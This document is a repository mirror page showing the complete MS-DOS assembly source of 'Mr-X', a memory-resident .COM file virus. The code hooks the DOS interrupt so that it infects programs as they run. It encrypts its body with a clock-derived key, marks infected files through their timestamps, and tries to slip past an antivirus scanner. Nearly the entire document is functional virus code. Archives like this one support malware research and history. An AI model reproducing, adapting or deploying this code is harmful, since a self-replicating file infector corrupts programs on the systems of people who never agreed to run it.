Mirrors/vxug-MalwareSourceCode
13
1
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-28 09:52:32 +00:00
Code Releases Activity
6332d7096f
vxug-MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.mr-x.asm
vxunderground f76af55eb4
Add files via upload
2021-01-12 17:52:14 -06:00

386 lines
5.7 KiB
NASM
Raw Blame History

;******************************************************************************
;******************************************************************************
;**** Virus: .COM /noTBAV ****
;**** By: Ramthes Jones ****
;******************************************************************************
;******************************************************************************
CODE SEGMENT
ASSUME CS:CODE, DS:CODE, ES:CODE, SS:CODE
ORG 0100h
DELTA EQU (TWO - ONE)
START:
JMP VIR_START
NOP
MOV AH,09h
MOV DX,OFFSET MSG
PUSH CS
POP DS
INT 21h
INT 20h
MSG DB 0Ah,0Dh,'Virus Mr-X activado!!!',0Ah,0Dh
DB 'Por favor no ejecute ningun archivo. Je, je, je...',0Ah,0Dh,'$'
VIR_START:
ONE LABEL BYTE
MOV BX,015Dh
PUSH BX
MOV SI,(OFFSET BEGIN - OFFSET ONE) - 1; Conocido
ADD SI,BX
MOV CX,(OFFSET TWO - OFFSET BEGIN) + 1; Conocido
MOV DX,0FFCDh ; FFCD = INT FFh
CLI
BUCLE:
MOV AH,[SI]
XOR AH,00h
DB 06 DUP (90h)
MOV [bx+30],DX
INTFFh LABEL WORD
MOV [SI],AH
MOV [bx+30],2488h
INC SI
LOOP BUCLE
STI
JMP ATBV
JODER:
MOV AH,4Ch
INT 21h
ATBV:
MOV AH,30h
INT 21h
BEGIN:
MOV AX,0ACACh
INT 21h
CMP AX,0CACAh
JE RUN_COM
JMP STAY_IN_MEMO
RUN_COM:
PUSH CS
PUSH CS
POP DS
POP ES
POP BX
MOV DI,100h
LEA SI,[(NORMAL - OFFSET ONE) + BX]
MOVSW
MOVSB
PUSH CS
PUSH 0100h
RETF
STAY_IN_MEMO:
MOV AH,4Ah
XOR BX,BX
INT 21h
MOV AH,4Ah
MOV BX,0FFFFh
INT 21h
SUB BX,61h ;101h
MOV AH,4Ah
INT 21h
MOV AH,48h
MOV BX,60h ;100h
INT 21h
MOV ES,AX
PUSH ES
DEC AX
MOV ES,AX
MOV ES:WORD PTR [0001h], 0008h
POP ES
PUSH CS
POP DS
POP SI
PUSH SI
XOR DI,DI
MOV CX,DELTA
CLD
REP MOVSB
PUSH ES
POP DS
MOV AX,3521h
INT 21h
POP SI
PUSH SI
MOV DS:[INT21IP - OFFSET ONE],BX
MOV DS:[INT21CS - OFFSET ONE],ES
MOV AX,2521h
MOV DX,(OFFSET HOOK_21 - OFFSET ONE)
INT 21h
JMP RUN_COM
HOOK_21 PROC FAR
PUSH DS
PUSHF
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH SI
PUSH DI
PUSH DS
PUSH ES
CMP AX,4B00h
JE INFECT_COM
CMP AX,0ACACh
JE GIVE_MARK
JMP FIN
GIVE_MARK:
POP ES
POP DS
POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
POPF
POP DS
MOV AX,0CACAh
IRET
INFECT_COM:
PUSH AX
PUSH BX
PUSH DX
PUSH DS
PUSH ES
MOV AX, CS
MOV DS, AX
MOV AX,3524h
PUSHF
CALL DWORD PTR DS:[INT21IP - OFFSET ONE]
MOV DS:[INT24IP - OFFSET ONE],BX
MOV DS:[INT24CS - OFFSET ONE],ES
MOV AX,2524h
MOV DX,(OFFSET HOOK_24 - OFFSET ONE)
PUSHF
CALL DWORD PTR DS:[INT21IP - OFFSET ONE]
POP ES
POP DS
POP DX
POP BX
POP AX
PUSH DX
MOV AX,4300h
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
MOV CS:[(ATRIBUTOS - OFFSET ONE)],CX
MOV AX,4301h
MOV CX,20h
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
JC FINAL_1
MOV AX,3D02h
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
PUSH AX
POP BX
MOV AH,3Fh
MOV CX,2
PUSH CS
POP DS
MOV DX,(OFFSET NORMAL - OFFSET ONE)
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
XOR SI,SI
mov ax,cs:(normal - offset one)[si]
cmp ax,'ZM'
je final_1
jmp conti
FINAL_1:
JMP FINAL
CONTI:
MOV AX,5700h
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
MOV CS:[(HORA - OFFSET ONE)],CX
MOV CS:[(FECHA - OFFSET ONE)],DX
AND CL,00011111b ; Esto es lo correcto para comprobar
CMP CL,00001101b ; si los segundos son 26
JE FINAL_1
XOR AL,AL
CALL F_42h
MOV AH,3Fh
MOV CX,3
PUSH CS
POP DS
MOV DX,(OFFSET NORMAL - OFFSET ONE)
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
MOV AL,02h
CALL F_42h
PUSH AX
SUB AX,3
MOV SI,1
MOV CS:(BUFFER - OFFSET ONE)[SI],AL
INC SI
MOV CS:(BUFFER - OFFSET ONE)[SI],AH
PUSH BX
MOV AH,48h
MOV BX,150h
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
MOV ES,AX
POP BX
PUSH CS
POP DS
XOR SI,SI
MOV DI,SI
MOV CX,OFFSET TWO - OFFSET ONE
CLD
REP MOVSB
PUSH ES
POP DS
POP AX ; Calculo
INC AH ; la direccion
XOR SI,SI ; donde va a
MOV [SI + 1],AL ; comenzar el
MOV [SI + 2],AH ; arch infectado
MOV AH,2Ch
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
MOV [SI+20],DL
MOV CX,(OFFSET TWO - OFFSET BEGIN) + 1
MOV SI,(OFFSET BEGIN - OFFSET ONE) - 1
ENCRIPTO:
XOR ES:[SI],DL
INC SI
LOOP ENCRIPTO
MOV AH,40h
MOV CX,DELTA
XOR DX,DX
PUSH ES
POP DS
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
JC FINAL
MOV AH,49h
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
XOR AL,AL
CALL F_42h
MOV AH,40h
MOV CX,3
MOV DX,(OFFSET BUFFER - OFFSET ONE)
PUSH CS
POP DS
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
MOV AX,5701h
MOV CX,CS:[(HORA - OFFSET ONE)]
AND CL,11100000b
OR CL,00001101b
MOV DX,CS:[(FECHA - OFFSET ONE)]
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
FINAL:
MOV AH,3Eh
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
MOV AX,4301h
MOV CX,CS:[(ATRIBUTOS - OFFSET ONE)]
POP DX
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
MOV AX,2524h
MOV DX,CS:[INT24IP - OFFSET ONE]
MOV DS,CS:[INT24CS - OFFSET ONE]
PUSHF
CALL DWORD PTR CS:[INT21IP-OFFSET ONE]
FIN:
POP ES
POP DS
POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
POPF
POP DS
JMP DWORD PTR CS:[(INT21IP - OFFSET ONE)]
F_42h PROC
MOV AH,42h
CWD
MOV CX,DX
PUSHF
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
RET
F_42h ENDP
HOOK_21 ENDP
HOOK_24 PROC
XOR AL,AL
IRET
HOOK_24 ENDP
INT21IP DW 0
INT21CS DW 0
INT24IP DW 0
INT24CS DW 0
INT17IP DW 0
INT17CS DW 0
ATRIBUTOS DW 0
HORA DW 0
FECHA DW 0
BUFFER DB 3 DUP(0E9h)
NORMAL DB 3 DUP(90h)
HIDDEN_MSG DB "Ramthes. World Cup'98: ARGENTINA!!"
TWO LABEL BYTE
CODE ENDS
END START
View Git Blame Copy Permalink